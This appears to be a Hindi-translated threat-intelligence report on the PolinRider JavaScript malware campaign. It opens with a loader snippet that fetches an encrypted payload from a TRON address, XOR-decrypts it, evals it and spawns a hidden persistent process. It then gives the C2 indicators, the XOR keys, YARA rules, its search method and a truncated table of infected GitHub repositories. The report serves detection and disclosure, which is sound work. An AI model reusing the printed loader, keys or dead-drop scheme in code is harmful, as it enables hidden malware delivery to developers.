const encryptedPayload = await fetchPayloadFromTron("TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP");
const decryptedCode = xorDecrypt(encryptedPayload, "2[gWfGj;<:-93Z^C");
eval(decryptedCode);  // EXECUTES ARBITRARY CODE

// Persistence via detached child process
require('child_process').spawn('node', ['-e', `global['_V']='...'${decryptedCode}`], {
    detached: true,
    stdio: 'ignore',
    windowsHide: true
});

C2 बुनियादी ढाँचा (समझौता संकेतक)

Vercel-होस्टेड HTTP C2 एंडपॉइंट (TasksJacker-पक्ष वेक्टर)

.vscode/tasks.json में runOn: folderOpen के साथ curl | bash पेलोड में उपयोग किया गया। सभी URL पैटर्न https://<sub>.vercel.app/settings/(mac|linux|win)?flag=<N> का अनुसरण करते हैं। ये हमलावर-नियंत्रित बूटस्ट्रैप सर्वर हैं जो VS Code पीड़ितों को PolinRider JS लोडर प्रदान करते हैं।

सभी पाँच vscode-* / default-configuration डोमेन 10–11 अप्रैल की खोज में पाए गए और अब OSM शिकार क्वेरी सेट का हिस्सा हैं। और अधिक सहोदर सबडोमेन की उम्मीद करें क्योंकि Vercel डोमेन खतरे वाले अभिनेता के लिए सस्ते/डिस्पोजेबल होते हैं।

ब्लॉकचेन पते (PolinRider-JS-लोडर दूसरे-चरण डेड-ड्रॉप)

TRON पते (प्राथमिक C2)

  • TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP (प्राथमिक)
  • TXfxHUet9pJVU1BgVkBAbrES4YUc1nGzcG (द्वितीयक)

API एंडपॉइंट: https://api.trongrid.io/v1/accounts/

Aptos लेन-देन हैश (फ़ॉलबैक C2)

  • 0xbe037400670fbf1c32364f762975908dc43eeb38759263e7dfcdabc76380811e (प्राथमिक)
  • 0x3f0e5781d0855fb460661ac63257376db1941b2bb522499e4757ecb3ebd5dce3 (द्वितीयक)

API एंडपॉइंट: https://fullnode.mainnet.aptoslabs.com/v1/accounts/

BSC RPC नोड्स

  • bsc-dataseed.binance.org
  • bsc-rpc.publicnode.com

विधि: eth_getTransactionByHash

XOR डिक्रिप्शन कुंजियाँ

  • प्राथमिक कुंजी: 2[gWfGj;<:-93Z^C
  • द्वितीयक कुंजी: m6:tTh^D)cBz?NM]

StakingGame टेम्पलेट UUID

  • e9b53a7c-2342-4b15-b02d-bd8b8f6a03f9 — दुर्भावनापूर्ण .vscode/tasks.json के projectInfo.uuid फ़ील्ड में StakingGame नकली-साक्षात्कार टेम्पलेट के लिए दिखाई देता है। अत्यधिक विशिष्ट; परीक्षण में 0 झूठी सकारात्मकता।

YARA नियम (सुझावित) — दोनों वेरिएंट को कवर करता है

मूल rmcej_otb_payload नियम (अभी भी मूल वेरिएंट के लिए मान्य) को एक बहु-वेरिएंट नियम द्वारा प्रतिस्थापित किया गया है जो मूल rmcej%otb% स्ट्रेन और घुमाए गए Cot%3t=shtP स्ट्रेन दोनों को पकड़ता है। इसका उपयोग स्थैतिक विश्लेषण पाइपलाइनों में करें।```yara rule polinrider_payload { meta: description = "Detects PolinRider shuffle-cipher JS payloads — both rmcej%otb% (v1) and Cot%3t=shtP (v2) variants" author = "OpenSourceMalware.com" date = "2026-04-10" severity = "high"

root@kitploit:~
strings:
    // Original variant (rmcej%otb%)
    $marker_v1   = "rmcej%otb%"
    $seed1_v1    = "2857687"
    $seed2_v1    = "2667686"
    $varname_v1  = "_$_1e42"
    $global_bang = "global['!']"

    // New variant (Cot%3t=shtP)
    $marker_v2   = "Cot%3t=shtP"
    $seed1_v2    = "1111436"
    $seed2_v2    = "3896884"
    $varname_v2  = "MDy"
    $global_V    = "global['_V']"

    // Common across variants
    $global_r    = "global['r'] = require"
    $global_m    = "global['m'] = module"

condition:
    any of ($marker_*) or
    ($global_bang and ($seed1_v1 or $varname_v1)) or
    ($global_V    and ($seed1_v2 or $varname_v2)) or
    ($global_r and $global_m and (any of ($seed1_*)))

}

root@kitploit:~
### YARA Rule (पुरातन) — केवल मूल संस्करण```yara
rule rmcej_otb_payload {
    meta:
        description = "Detects rmcej%otb% shuffle-cipher JS payload injected into config files (original variant only)"
        author = "OpenSourceMalware.com"
        date = "2026-03-07"
        severity = "high"

    strings:
        $marker   = "rmcej%otb%"
        $global   = "global['!']"
        $seed1    = "2857687"
        $seed2    = "2667686"
        $varname  = "_$_1e42"

    condition:
        $marker or ($global and $seed1) or ($varname and $seed2)
}

डेटा संग्रह (मार्च 8 — मूल विधि)

डेटा gh search code के माध्यम से GitHub Code Search API का उपयोग करके एकत्र किया गया था, प्रति संक्रमित फ़ाइलनाम एक क्वेरी चलाकर 1,000-परिणाम-प्रति-क्वेरी सीमा से बचने के लिए। परिणाम रिपॉजिटरी पूर्ण नाम द्वारा डिडुप्लिकेट किए गए थे।

परिशोधन पद्धति (अप्रैल 10 — विस्तारित विधि)

10 अप्रैल की खोज ने पांच ऑर्थोगोनल पिवट को जोड़कर और एक्सटेंशन/साइज़/फ़ोर्क रणनीति लागू करके डेटा संग्रह का विस्तार किया ताकि सबसे शक्तिशाली पिवट पर GitHub Code Search की 1,000-परिणाम-प्रति-क्वेरी सीमा को पार किया जा सके।

अप्रैल 10–11 की खोज में उपयोग किए गए पिवट

1,000-परिणाम सीमा को पार करना

_$_1e42 डिकोडर फ़ंक्शन-नाम क्वेरी ने total_count: 968 की सूचना दी और 1,000 वापस आइटम पर सीमित हो गई, लेकिन GitHub वेब UI ने 1,400+ मिलान दिखाए। ऑर्थोगोनल उप-क्वेरी में परिशोधन करके जो प्रत्येक 1,000 परिणामों से नीचे रहें, और फिर संघ लेने से सीमा टूट गई:

इस अभ्यास से तीन महत्वपूर्ण निष्कर्ष:

  1. सबसे बड़ा छिपा हुआ अंतर फ़ोर्क था। GitHub Code Search डिफ़ॉल्ट रूप से फ़ोर्क को बाहर करता है (fork:false)। fork:true जोड़ने से 157 फ़ोर्क रिपॉजिटरी का पता चला जिनमें मार्कर था जो मूल क्वेरी से पूरी तरह अदृश्य थे।
  2. size:5000..10000 रेंज को 1KB स्लाइस में उप-बकेट करने पर 986 परिणाम मिले, जबकि बकेट की रिपोर्टेड 968 थी — 1000 से कम रिपोर्टेड कुल के भीतर भी, सीमा प्रविष्टियों को छिपा सकती है। सही दृष्टिकोण पुनरावर्ती बकेटिंग है जब तक प्रत्येक बकेट सीमा से काफी नीचे न हो।
  3. extension: विभाजन language: विभाजनों की तुलना में अधिक कुल परिणाम देते हैं क्योंकि GitHub की भाषा पहचान कभी-कभी JavaScript बकेट से .mjs और .cjs को बाहर कर देती है।

क्रॉस-इंजन संघ (वास्तविक दायरा)

अप्रैल 10–11 की खोज डेटा को मौजूदा affected_repos.csv के साथ जोड़ने से वर्तमान में ज्ञात वास्तविक कोष प्राप्त होता है:

नमूना-सत्यापित गलत सकारात्मक दर

खोज के दोनों राउंड में लिए गए 44 यादृच्छिक नमूनों में, 0 गलत सकारात्मक देखे गए। प्रत्येक नमूना रिपॉजिटरी में कम से कम एक PolinRider अपरिवर्तनीय (rmcej%otb%, Cot%3t=shtP, _$_1e42, MDy, global['!'], global['_V'], प्रसार .bat के अंदर LAST_COMMIT_DATE, package.json में एक ज्ञात दुर्भावनापूर्ण npm पैकेज, या एक ज्ञात C2 सबडोमेन पर curl \| bash के साथ एक .vscode/tasks.json) शामिल था, अनुक्रमित पिवट पथ पर फ़ाइल में।

राउंड 2 ने विशेष रूप से सबमिशन वर्गीकरण में दो नए प्रकार वर्गीकरण पेश किए:

  • malicious_npm: रिपॉजिटरी में package.json में 7 ज्ञात दुर्भावनापूर्ण npm पैकेजों में से एक है (45 सबमिशन — लगभग सभी ShoeVista टेम्पलेट पुनः अपलोड)।
  • tasksjacker: रिपॉजिटरी में एक .vscode/tasks.json है जिसमें runOn: folderOpen कार्य है जो Vercel/Render/Railway C2 सबडोमेन के खिलाफ curl \| bash या wget \| sh निष्पादित करता है (27 सबमिशन — इसमें StakingGame टेम्पलेट क्लस्टर शामिल है)।

फ़ाइलें


समझौता किए गए रिपॉजिटरी

सभी समझौता किए गए रिपॉजिटरी OpenSourceMalware टैग #polinrider के माध्यम से पाए जा सकते हैं।

आउटरीच प्राथमिकता

पूर्ण CSV प्रभाव के आधार पर ट्रायेज के लिए क्रमबद्ध हैं।

सितारे + फ़ोर्क द्वारा शीर्ष रिपॉजिटरी

अनुयायियों द्वारा शीर्ष संगठन

अनुयायियों द्वारा शीर्ष व्यक्तिगत उपयोगकर्ता

प्राथमिकता लक्ष्य: sparktechagency (130 अनुयायी, 12 रिपॉजिटरी) और FSDTeam-SAA (21 अनुयायी, 12 रिपॉजिटरी) सबसे अधिक मात्रा वाले संगठन हैं। व्यक्तियों में, coderkhalide (349 अनुयायी) की सबसे व्यापक प्रत्यक्ष पहुँच है।


8 मार्च, 2026 तक सभी समझौता किए गए रिपॉजिटरी| # | भंडार | स्वामी | स्वामी प्रकार | तारे | कांटे | संक्रमित फ़ाइलें | फ़ाइल पथ | विवरण | भंडार URL |

| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | | 1 | Codechef-VITC-Student-Chapter/Club-Integration-and-Management-Platform | Codechef-VITC-Student-Chapter | संगठन | 6 | 11 | 1 | Client/postcss.config.mjs | | https://github.com/Codechef-VITC-Student-Chapter/Club-Integration-and-Management-Platform | | 2 | sparktechagency/Vap-shop-Front-End- | sparktechagency | संगठन | 7 | 0 | 1 | postcss.config.mjs | VapeShopMaps – एक B2B सामाजिक और ई-कॉमर्स प्लेटफ़ॉर्म जो उपयोगकर्ताओं, स्टोर, ब्रांड और थोक विक्रेताओं को वास्तविक समय की सामाजिक सुविधाओं और उन्नत SEO अनुकूलन के साथ जोड़ता है। | https://github.com/sparktechagency/Vap-shop-Front-End- | | 3 | MIS-Silekta/silekta-frontend | MIS-Silekta | संगठन | 1 | 3 | 1 | postcss.config.mjs | यह MIS मॉड्यूल के लिए silekta कंपनी का फ्रंटएंड रिपॉजिटरी है। | https://github.com/MIS-Silekta/silekta-frontend | | 4 | UzairOrganization/allTask | UzairOrganization | संगठन | 0 | 2 | 1 | postcss.config.mjs | | https://github.com/UzairOrganization/allTask | | 5 | FSDTeam-SAA/nico41278-frontend | FSDTeam-SAA | संगठन | 0 | 2 | 1 | postcss.config.mjs | | https://github.com/FSDTeam-SAA/nico41278-frontend | | 6 | FSDTeam-SAA/cstrat_frontend | FSDTeam-SAA | संगठन | 1 | 1 | 1 | postcss.config.mjs | | https://github.com/FSDTeam-SAA/cstrat_frontend | | 7 | SoftySkills/quiz_app | SoftySkills | संगठन | 3 | 0 | 1 | postcss.config.mjs | | https://github.com/SoftySkills/quiz_app | | 8 | dawahanigeria-team/rayyan-server | dawahanigeria-team | संगठन | 3 | 0 | 1 | eslint.config.mjs | Rayyan ऐप सर्वर | https://github.com/dawahanigeria-team/rayyan-server | | 9 | FSDTeam-SAA/sahara_53 | FSDTeam-SAA | संगठन | 0 | 1 | 1 | postcss.config.mjs | Build a Story Time एक AI-संचालित प्लेटफ़ॉर्म है जो उपयोगकर्ताओं को अपनी आवाज़ और चेहरे को पात्रों के रूप में उपयोग करके व्यक्तिगत स्टोरीबुक बनाने देता है। यह कहानी कहने को एक जादुई, इंटरैक्टिव और गहरा व्यक्तिगत अनुभव में बदल देता है। | https://github.com/FSDTeam-SAA/sahara_53 | | 10 | FSDTeam-SAA/lowready-frontend | FSDTeam-SAA | संगठन | 0 | 1 | 1 | postcss.config.mjs | | https://github.com/FSDTeam-SAA/lowready-frontend | | 11 | Addis-Career/Frontend | Addis-Career | संगठन | 0 | 1 | 1 | postcss.config.mjs | | | | 12 | etrainermis/mineduc-Form | etrainermis | संगठन | 0 | 1 | 1 | postcss.config.mjs | EAC World Kiswahili Language Day Celebrations Forum | | | 13 | FSDTeam-SAA/brazen-kits | FSDTeam-SAA | संगठन | 0 | 1 | 1 | postcss.config.mjs | | | | 14 | FSDTeam-SAA/Igghy-dashboard | FSDTeam-SAA | संगठन | 0 | 1 | 1 | postcss.config.mjs | | | | 15 | FlowBondTech/danz-miniapps | FlowBondTech | संगठन | 0 | 1 | 2 | danz-main/postcss.config.mjs | daily-danz/postcss.config.mjs | | | | 16 | BrennansWave-com/brennanswave | BrennansWave-com | संगठन | 0 | 1 | 1 | postcss.config.mjs | | | | 17 | FlowBondTech/danz-web | FlowBondTech | संगठन | 0 | 1 | 1 | postcss.config.mjs | | | | 18 | QualifyAI/qualify-frontend | QualifyAI | संगठन | 0 | 1 | 1 | postcss.config.mjs | | | | 19 | FSDTeam-SAA/ftfdesignco-backend | FSDTeam-SAA | संगठन | 0 | 1 | 1 | src/router/index.js | | | | 20 | Gamage-Recruiters-406/Rent_a_Car | Gamage-Recruiters-406 | संगठन | 1 | 0 | 1 | frontend/postcss.config.mjs | | | | 21 | Umbrelabs-Projects/Procobiz | Umbrelabs-Projects | संगठन | 1 | 0 | 1 | postcss.config.mjs | | | | 22 | The-Extra-Project/Extra_surface_repo | The-Extra-Project | संगठन | 1 | 0 | 1 | frontend/postcss.config.mjs | Laurent के संस्करण का Extra-surface के लिए तैनाती संस्करण। | | | 23 | Automobile-System/frontend | Automobile-System | संगठन | 1 | 0 | 1 | postcss.config.mjs | | | | 24 | VplayProCrypto/mvp_vercel | VplayProCrypto | संगठन | 1 | 0 | 1 | tailwind.config.js | चरण 1 mvp का रिपॉजिटरी | | | 25 | sparktechagency/nskustoms_custom_game_site-2.0 | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 26 | softvence-omega-future-stack/gameluke-frontend | softvence-omega-future-stack | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 27 | NexumTechnologies/E-Commerce | NexumTechnologies | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 28 | Umbrelabs-Projects/Hostella-superAdmin | Umbrelabs-Projects | संगठन | 0 | 0 | 1 | postcss.config.mjs | यह रिपॉजिटरी उन लोगों के लिए है जो एडमिन पंजीकृत करेंगे | | | 29 | FSDTeam-SAA/admin-dashboard-gman | FSDTeam-SAA | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 30 | sparktechagency/protippz_website | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 31 | FlowRMS/flow-connect-frontend-new | FlowRMS | संगठन | 0 | 0 | 1 | postcss.config.mjs | FlowConnect फ्रंटएंड एप्लिकेशन | | | 32 | Anthem-InfoTech-Pvt-Ltd/dashboards | Anthem-InfoTech-Pvt-Ltd | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 33 | WeOwnAiAgents-Hackerhouse/WeOwnAiAgent | WeOwnAiAgents-Hackerhouse | संगठन | 0 | 0 | 1 | postcss.config.mjs | अंतिम ऑर्केस्ट्रेशन एजेंट ऑर्केस्ट्रेशन प्लेटफ़ॉर्म बनाना जो संप्रभु, टोकनॉमिक्स-संचालित और web3 समुदाय के लिए बनाया गया है। ethdenver हैकथॉन के लिए योगदान। | | | 34 | Karigar-App/Karigar | Karigar-App | संगठन | 0 | 0 | 1 | packages/ui/postcss.config.mjs | | | | 35 | sparktechagency/silicon-zisan-website | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 36 | FSDTeam-SAA/hinkel-Website | FSDTeam-SAA | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 37 | FSDTeam-SAA/iwmsadvisors | FSDTeam-SAA | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 38 | Umbrelabs-Projects/Hostella-admin | Umbrelabs-Projects | संगठन | 0 | 0 | 1 | postcss.config.mjs | Hostella एडमिन प्लेटफ़ॉर्म | | | 39 | Umbrelabs-Projects/Hostella-stu | Umbrelabs-Projects | संगठन | 0 | 0 | 1 | postcss.config.mjs | Hostella छात्र छात्रावास बुकिंग प्लेटफ़ॉर्म | | | 40 | iwb25-412-vertex-prime/apigateway-v1 | iwb25-412-vertex-prime | संगठन | 0 | 0 | 1 | userportal/postcss.config.mjs | उपयोगकर्ता पोर्टल + प्रबंधन परत | कोटा प्रबंधन, नियम प्रवर्तन, API कुंजी सत्यापन। | | | 41 | Cloudrika/cloudrika-web | Cloudrika | संगठन | 0 | 0 | 2 | packages/ui/postcss.config.mjs | apps/email-portal/next.config.mjs | | | | 42 | sparktechagency/consult_dashboard | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 43 | sparktechagency/jonowoods-website | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 44 | Softvence-Omega-Dev-Ninjas/diaz-jupiter-marine-frontend | Softvence-Omega-Dev-Ninjas | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 45 | sparktechagency/profitable-website-v2 | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 46 | musetax/Amus-fe | musetax | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 47 | sparktechagency/faceAi-front-end | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 48 | sparktechagency/any-job-dashboard | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 49 | sparktechagency/anyjob-web | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 50 | softvence-omega-future-stack/lawalx_frontend | softvence-omega-future-stack | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 51 | softvence-omega-future-stack/kilian-rodhe-last- | softvence-omega-future-stack | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 52 | WeOwnNetwork/EthDenver-submission | WeOwnNetwork | संगठन | 0 | 0 | 1 | apps/web/postcss.config.mjs | ऑनचेन एजेंट रजिस्ट्री के साथ #FedArch ऑर्केस्ट्रेशन इंफ्रा क्लाइंट बनाना। ETHDenver 2026 हैकथॉन के लिए सबमिशन | | | 53 | sparktechagency/betopia-website | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 54 | FlowRMSLabs/flowdemandwebsite | FlowRMSLabs | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 55 | BhavikPatel-dreamz/wove-gift-portal | BhavikPatel-dreamz | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 56 | BhavikPatel-dreamz/DynamicDreamz-AIagent-Demos | BhavikPatel-dreamz | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 57 | GARAGE-POS/nextjs_test | GARAGE-POS | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 58 | BhavikPatel-dreamz/Homeopathway | BhavikPatel-dreamz | संगठन | 0 | 0 | 1 | postcss.config.mjs | Homeopathway | | | 59 | digitalschool-tech/tech-static | digitalschool-tech | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 60 | tricodenetwork/lock-up | tricodenetwork | संगठन | 0 | 0 | 1 | frontend/postcss.config.mjs | | | | 61 | Sahl-AI/sahl-ai-iframe | Sahl-AI | संगठन | 0 | 0 | 1 | tailwind.config.js | इसमें iframe दृष्टिकोण का परीक्षण करने के लिए डेमो react ऐप शामिल है | | | 62 | dawahanigeria-team/domainping | dawahanigeria-team | संगठन | 0 | 0 | 1 | frontend/tailwind.config.js | | | | 63 | shahid538org/microrealestate | shahid538org | संगठन | 0 | 0 | 1 | webapps/landlord/tailwind.config.js | | | | 64 | orynth-dev/vite-shadcn-template | orynth-dev | संगठन | 0 | 0 | 1 | tailwind.config.js | | | | 65 | FlowBondTech/egator | FlowBondTech | संगठन | 0 | 0 | 1 | apps/web/tailwind.config.js | AIeGator - AI-संचालित इवेंट एकत्रीकरण इंजन (ETHDenver via Luma) | | | 66 | sparktechagency/u_tee_hub | sparktechagency | संगठन | 0 | 0 | 1 | tailwind.config.js | | | | 67 | Enigma-Incorporated-Ltd/N0DE-Website | Enigma-Incorporated-Ltd | संगठन | 0 | 0 | 2 | tailwind.config.js | src/tailwind.config.js | | | | 68 | FSDTeam-SAA/AMES_Investment_new | FSDTeam-SAA | संगठन | 0 | 0 | 1 | tailwind.config.js | | | | 69 | Frontier-tech-consulting/olas-mcp-application-workflow | Frontier-tech-consulting | संगठन | 0 | 0 | 1 | docs/tailwind.config.js | इसमें Olas इकोसिस्टम के संबंधित UI मॉकअप वर्कफ़्लो शामिल है (उपयोगकर्ताओं को ऑनचेन इंटरैक्शन के लिए MCP एप्लिकेशन चलाने देने के लिए)। | | | 70 | Softvence-Omega-Dev-Ninjas/vic_pec_server_app | Softvence-Omega-Dev-Ninjas | संगठन | 0 | 0 | 1 | eslint.config.mjs | | | | 71 | Softvence-Omega-Dev-Ninjas/jdadzok_server | Softvence-Omega-Dev-Ninjas | संगठन | 0 | 0 | 1 | eslint.config.mjs | | | | 72 | Binary-Mindz/agimtula_server | Binary-Mindz | संगठन | 0 | 0 | 1 | eslint.config.mjs | | | | 73 | Softvence-Omega-Dev-Ninjas/alvaaro-server | Softvence-Omega-Dev-Ninjas | संगठन | 0 | 0 | 1 | eslint.config.mjs | | | | 74 | Softvence-Omega-Cyber-Monk/nishant-server | Softvence-Omega-Cyber-Monk | संगठन | 0 | 0 | 1 | eslint.config.mjs | | | | 75 | softvence-omega-future-stack/huss-be | softvence-omega-future-stack | संगठन | 0 | 0 | 1 | eslint.config.mjs | | | | 76 | BhavikPatel-dreamz/Products-filters-react | BhavikPatel-dreamz | संगठन | 0 | 0 | 1 | src/App.js | | | | 77 | Victorola-coder/tewo | Victorola-coder | उपयोगकर्ता | 9 | 6 | 1 | tailwind.config.js | tewosimi boboyi, ebi n pami | | | 78 | Atik203/Scholar-Flow | Atik203 | उपयोगकर्ता | 4 | 4 | 1 | apps/frontend/postcss.config.mjs | ScholarFlow एक SaaS प्लेटफ़ॉर्म है जो शोधकर्ताओं, छात्रों, प्रोफेसरों और शैक्षणिक टीमों के लिए डिज़ाइन किया गया है ताकि शोध पत्रों को अपलोड, व्यवस्थित, समीक्षा और साझा शोध पुस्तकालय में संग्रह, एनोटेशन, खोज और टीम सहयोग के साथ प्रबंधित किया जा सके। | | | 79 | Kreliannn/Document-Request-System-FRONTEND | Kreliannn | उपयोगकर्ता | 8 | 1 | 1 | postcss.config.mjs | एक वेब-आधारित प्रणाली जो निवासियों को बरंगे हॉल में जाए बिना ऑनलाइन बरंगे दस्तावेज़ों का अनुरोध करने देती है। निवासी अपने अनुरोध की स्थिति को ट्रैक कर सकते हैं, ईमेल सूचनाएं प्राप्त कर सकते हैं, और अनुरोध इतिहास देख सकते हैं। बरंगे प्रशासक अनुरोधों का प्रबंधन कर सकते हैं, स्थितियों को अपडेट कर सकते हैं, और लेन-देन इतिहास को ट्रैक कर सकते हैं। | | | 80 | coderkhalide/Anti-Detect-Browser | coderkhalide | उपयोगकर्ता | 2 | 4 | 1 | src/renderer/tailwind.config.js | | | | 81 | WeerasingheMSC/ASMS_Frontend | WeerasingheMSC | उपयोगकर्ता | 1 | 4 | 1 | asms_frontend/postcss.config.mjs | फुल-स्टैक ऑटोमोबाइल सेवा समय लॉगिंग और अपॉइंटमेंट सिस्टम जो Next.js, TypeScript, TailwindCSS और Ant Design के साथ फ्रंटएंड के लिए बनाया गया है। इसमें ग्राहक और कर्मचारी पोर्टल, रीयल-टाइम सेवा ट्रैकिंग, अपॉइंटमेंट बुकिंग, समय लॉगिंग और कंटेनरीकृत तैनाती शामिल है। | | | 82 | fsdteam8/n_Krypted-frontend | fsdteam8 | उपयोगकर्ता | 0 | 4 | 1 | postcss.config.mjs | | | | 83 | tanushbhootra576/Bionary-Website-Challenge-and-final | tanushbhootra576 | उपयोगकर्ता | 4 | 2 | 1 | bionary_website/tailwind.config.js | | | | 84 | Kreliannn/PDF-To-Reviewer-Quiz-FRONTEND | Kreliannn | उपयोगकर्ता | 7 | 0 | 1 | postcss.config.mjs | एक वेब ऐप जो AI का उपयोग करके PDF फ़ाइलों को Q&A प्रकार के रिव्यूअर में बदलता है। उपयोगकर्ता सहेजने से पहले जनरेट किए गए आउटपुट को अनुकूलित कर सकता है। उपयोगकर्ता उस सहेजे गए AI-जनरेटेड रिव्यूअर का उपयोग करके समीक्षा कर सकता है और अनुकूलन योग्य क्विज़ ले सकता है। | | | 85 | tanushbhootra576/collegeConnect | tanushbhootra576 | उपयोगकर्ता | 5 | 1 | 1 | postcss.config.mjs | | | | 86 | brown2020/ikigaifinder | brown2020 | उपयोगकर्ता | 4 | 1 | 1 | postcss.config.mjs | | | | 87 | Kreliannn/commision_portfolio | Kreliannn | उपयोगकर्ता | 6 | 0 | 1 | postcss.config.mjs | | | | 88 | coderkhalide/Trading-Journal | coderkhalide | उपयोगकर्ता | 4 | 1 | 1 | postcss.config.mjs | पेशेवर ट्रेडिंग जर्नल विभिन्न प्रणालियों और समय-सीमाओं में आपके ट्रेडिंग प्रदर्शन को ट्रैक, विश्लेषण और सुधारने के लिए। | | | 89 | tanushbhootra576/weather | tanushbhootra576 | उपयोगकर्ता | 4 | 1 | 1 | postcss.config.mjs | हैकथॉन परियोजना | | | 90 | Kreliannn/student-passed-rate-analysis-frontend | Kreliannn | उपयोगकर्ता | 5 | 0 | 1 | postcss.config.mjs | | | | 91 | Kreliannn/pharmacy-management-frontend | Kreliannn | उपयोगकर्ता | 5 | 0 | 1 | postcss.config.mjs | | | | 92 | Kreliannn/Employee-management-frontend | Kreliannn | उपयोगकर्ता | 5 | 0 | 1 | postcss.config.mjs | | | | 93 | Kreliannn/e-commerce-frontend | Kreliannn | उपयोगकर्ता | 5 | 0 | 1 | postcss.config.mjs | | | | 94 | umarabid123/The_INTERNET_OF_AGENTS_HACKATHON | umarabid123 | उपयोगकर्ता | 1 | 2 | 1 | frontend/postcss.config.mjs | | | | 95 | ahmadraza382/FinanceAi | ahmadraza382 | उपयोगकर्ता | 3 | 1 | 1 | tailwind.config.js | Finance Ai कोच | | | 96 | tanushbhootra576/turbo-happiness | tanushbhootra576 | उपयोगकर्ता | 4 | 0 | 1 | postcss.config.mjs | | | | 97 | shaheeer-dev/sketchers | shaheeer-dev | उपयोगकर्ता | 0 | 2 | 1 | postcss.config.mjs | | | | 98 | tanushbhootra576/game | tanushbhootra576 | उपयोगकर्ता | 4 | 0 | 1 | postcss.config.mjs | | | | 99 | tanushbhootra576/GridSaga | tanushbhootra576 | उपयोगकर्ता | 4 | 0 | 1 | postcss.config.mjs | | | | 100 | senulahesara/devkit | senulahesara | उपयोगकर्ता | 2 | 1 | 1 | postcss.config.mjs | आवश्यक उपकरण, ब्लेज़िंग-फास्ट प्रदर्शन, और ऑफ़लाइन-रेडी सुविधाएं - आपके वर्कफ़्लो को सुव्यवस्थित करने और आपको उस पर केंद्रित रखने के लिए बनाई गई हैं जो मायने रखता है: बेहतरीन कोड लिखना। | | | 101 | tanushbhootra576/week3-forms-and-inputs | tanushbhootra576 | उपयोगकर्ता | 4 | 0 | 1 | postcss.config.mjs | | | | 102 | tanushbhootra576/PW-app | tanushbhootra576 | उपयोगकर्ता | 4 | 0 | 1 | postcss.config.mjs | | | | 103 | tanushbhootra576/RESTRO | tanushbhootra576 | उपयोगकर्ता | 4 | 0 | 1 | tailwind.config.js | | | | 104 | tanushbhootra576/MoodSync | tanushbhootra576 | उपयोगकर्ता | 4 | 0 | 1 | App.js | | | | 105 | Amanbanti/Capstone | Amanbanti | उपयोगकर्ता | 1 | 1 | 1 | frontend/postcss.config.mjs | कैपस्टोन प्रोजेक्ट सॉफ्टवेयर इंजीनियरिंग (SE) और कंप्यूटर साइंस एंड इंजीनियरिंग (CSE) दोनों कार्यक्रमों के छात्रों के लिए एक समापन शैक्षणिक और व्यावहारिक अनुभव है। | | | 106 | ShifaLabs/shifa | ShifaLabs | उपयोगकर्ता | 1 | 1 | 1 | postcss.config.mjs | शेफा एक वेब-आधारित टेलीमेडिसिन प्लेटफ़ॉर्म है जो रोगियों को रीयल-टाइम इन-ऐप वीडियो कॉल के माध्यम से सत्यापित डॉक्टरों से परामर्श करने, डिजिटल प्रिस्क्रिप्शन प्राप्त करने और एक सुरक्षित और पेशेवर वातावरण में दूर से अपने स्वास्थ्य सेवा प्रबंधन करने में सक्षम बनाता है। यह एक तैनाती योग्य, उत्पादन-ग्रेड प्रणाली है, न कि डेमो या शैक्षणिक मॉक-अप। | | | 107 | SouravDn-p/mobile-canvas-nextjs | SouravDn-p | उपयोगकर्ता | 1 | 1 | 1 | postcss.config.mjs | MobileCanvas एक आधुनिक, फुल-स्टैक ई-कॉमर्स प्लेटफ़ॉर्म है जो गैजेट और मोबाइल उपकरणों की बिक्री पर केंद्रित है। Next.js, Redux Toolkit और MongoDB के साथ निर्मित, यह उपयोगकर्ताओं के लिए एक सुरक्षित, उत्तरदायी और सहज खरीदारी अनुभव और प्रशासकों के लिए शक्तिशाली प्रबंधन उपकरण प्रदान करता है। | | | 108 | RinSanom/IoTWeb | RinSanom | उपयोगकर्ता | 1 | 1 | 1 | postcss.config.mjs | | | | 109 | kanchana404/Google-bussiness-api-Get-reviews-and-Reply-reviews | kanchana404 | उपयोगकर्ता | 1 | 1 | 1 | postcss.config.mjs | | | | 110 | Salman1205/MailAssist | Salman1205 | उपयोगकर्ता | 1 | 1 | 1 | postcss.config.mjs | AI-संचालित ग्राहक सहायता प्लेटफ़ॉर्म जिसमें Gmail एकीकरण, स्मार्ट टिकटिंग, स्वचालित प्रतिक्रियाएं, Shopify एकीकरण और रीयल-टाइम टीम सहयोग शामिल है | | | 111 | Yassin-Younis/bypass-in-app-browser | Yassin-Younis | उपयोगकर्ता | 3 | 0 | 1 | next.config.mjs | Instagram, Facebook, TikTok और अन्य जैसे सोशल मीडिया ऐप्स से इन-ऐप ब्राउज़र को बायपास करें। जब उपयोगकर्ता आपके सोशल मीडिया विज्ञापनों पर क्लिक करते हैं तो उन्हें उनके मूल ब्राउज़र पर भेजें ताकि जुड़ाव, सटीक ट्रैकिंग और रूपांतरण बढ़ सके। | | | 112 | Lithira-Silva/TrueClaim---ITPM- | 